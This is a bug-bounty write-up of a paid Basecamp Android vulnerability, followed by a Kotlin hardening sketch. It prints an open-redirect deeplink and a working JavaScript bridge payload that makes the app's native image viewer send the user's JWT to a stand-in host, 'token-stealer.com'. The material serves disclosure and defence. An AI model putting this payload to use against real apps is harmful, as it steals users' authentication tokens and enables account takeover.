Android security — $6,337 vulnerability in basecamp

Background

The vulnerability

https://3.basecamp.com/5218370/verify?proceed_to=<attacker_website>

What then?

openNativeImageViewer
<script>NativeApp.openNativeImageViewer("[{'download_url': 'https://token-stealer.com/image.jpg', 'preview_url': 'https:/token-stealer.com/image.jpg', 'caption':'ViewImage'}]", 0)</script>
  • Send a deeplink URL to the Basecamp app
  • The app opens the link and loads the ‘proceed_to’ URL inside the WebViewActivity class
  • The WebViewActivity renders the proceed_to HTML (my stage 1 attack) in a special WebView
  • That WebView executes ‘openNativeImageViewer’, which (funny enough) opens a native image viewer
  • That image viewer fetches a URL (again controlled by me) and adds the user’s authentication token (i.e. the JWT) to the request header
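Two of the links in that chain can be cut on the app side: the deeplink handler can refuse to load a `proceed_to` value that is not on the app's own origin, and the image viewer can refuse to attach the session token to any host that is not its own API. The following is an added, hypothetical hardening sketch in Kotlin; it is not Basecamp's code, and the `TRUSTED_HOSTS` set, `safeProceedTo` and `tokenHeaderFor` are names assumed for this example.

```kotlin
import android.net.Uri

// Constructed allow-list for this example, not Basecamp's real configuration.
private val TRUSTED_HOSTS = setOf("3.basecamp.com", "basecamp.com")

// Returns true only for https URLs whose host is on the allow-list.
// Uri.host already strips userinfo, so "https://3.basecamp.com@evil.example/"
// resolves to host "evil.example" and is rejected.
private fun isTrusted(uri: Uri): Boolean {
    val host = uri.host?.lowercase() ?: return false
    return uri.scheme == "https" && host in TRUSTED_HOSTS
}

// Deeplink handler check: the value of ?proceed_to= may only be loaded into the
// WebView when it points back at the app's own origin. Any other value yields null,
// so an external page never gets the privileged JS bridge at all.
fun safeProceedTo(deeplink: Uri): Uri? {
    val raw = deeplink.getQueryParameter("proceed_to") ?: return null
    val target = Uri.parse(raw)
    return if (isTrusted(target)) target else null
}

// Image-viewer check: build the request headers for a download_url. The session
// token is added only when the image is served from a trusted host; for every other
// host the request goes out with no credentials, which is what defeats the
// token-stealing download_url described above.
fun tokenHeaderFor(downloadUrl: String, jwt: String): Map<String, String> {
    val uri = Uri.parse(downloadUrl)
    return if (isTrusted(uri)) mapOf("Authorization" to "Bearer $jwt") else emptyMap()
}
```

With these checks in place, the deeplink from the post resolves to null at `safeProceedTo`, and even if a page reached the bridge, `tokenHeaderFor("https://token-stealer.com/image.jpg", jwt)` returns an empty header map.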

Conclusions

Daniel Llewellyn